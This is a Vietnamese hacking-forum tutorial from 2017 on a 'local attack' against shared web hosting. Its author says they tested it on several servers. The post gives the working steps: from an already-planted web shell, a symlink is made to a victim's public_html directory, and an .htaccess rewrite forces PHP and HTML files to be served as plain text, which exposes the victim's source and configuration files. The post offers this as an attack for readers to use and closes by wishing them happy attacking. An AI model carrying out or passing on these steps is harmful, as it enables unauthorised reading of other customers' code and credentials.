[TUT] Local Attack - Symlink Directory

Discussion in 'Web Application Security & Hacking' started by Mickey, Dec 9, 2017.

 1. Mickey

  Mickey Hacking For Hacker Staff Member

  Cái này chắc nhiều người biết roài mà mình chỉ là một newbie nên đối với mình nó còn rất mới mẻ :D đã test thành công trren một vài server của pv nên giờ share lại cho ae chưa biết mong các pro đừng chém :D

  Symlink thì chắc nhiều người biết rồi tuy nhiên lang thang trên mạng đã lâu thì thấy đa số chỉ hướng dẫn symlink file config.php. Hôm nay mình sẽ hướng dẫn các bạn symlink thư mục :D chính là symlink thư mục public_html của victim or bất kỳ thư mục nào cũng được.

  Nguyên liệu:

  - Shell :)) tất nhiên là muốn local thì phải có shell trên server rồi
  - 2 Con shell mình sử dụng trong tut này là: webadmin, cgi

  Rồi bắt đầu thôi

  Đầu tiên chạy shell cgi và run lệnh:

  Mã:
  ln -s /home/user-victim/public_html public_html

  [​IMG]

  rồi vậy là ta đã tạo được symlink tới thư mục public_html của victim


  [​IMG]

  Tiếp theo sửa file htaccess thành:

  Mã:
  Options +FollowSymLinks
  DirectoryIndex cmd.html
  Options +Indexes
  RemoveHandler .hack
  AddType text/plain .hack
  Options Indexes FollowSymLinks
  DirectoryIndex cmd.html
  AddType txt .php
  AddHandler txt .php
  AddType txt .htm
  AddHandler txt .htm
  AddType txt .html
  AddHandler txt .html
  AddType txt .shtml
  AddHandler txt .shtml
  AddType txt .phtml
  AddHandler txt .phtml

  Rồi giờ đọc symlink thôi

  http://domain.com/path/public_html

  [​IMG]


  Đến đây rồi làm gì tiếp theo nữa chắc không cần phải nói nữa :D

  Done. End Tut

  Chúc các bạn local vui vẻ =))
   

Share This Page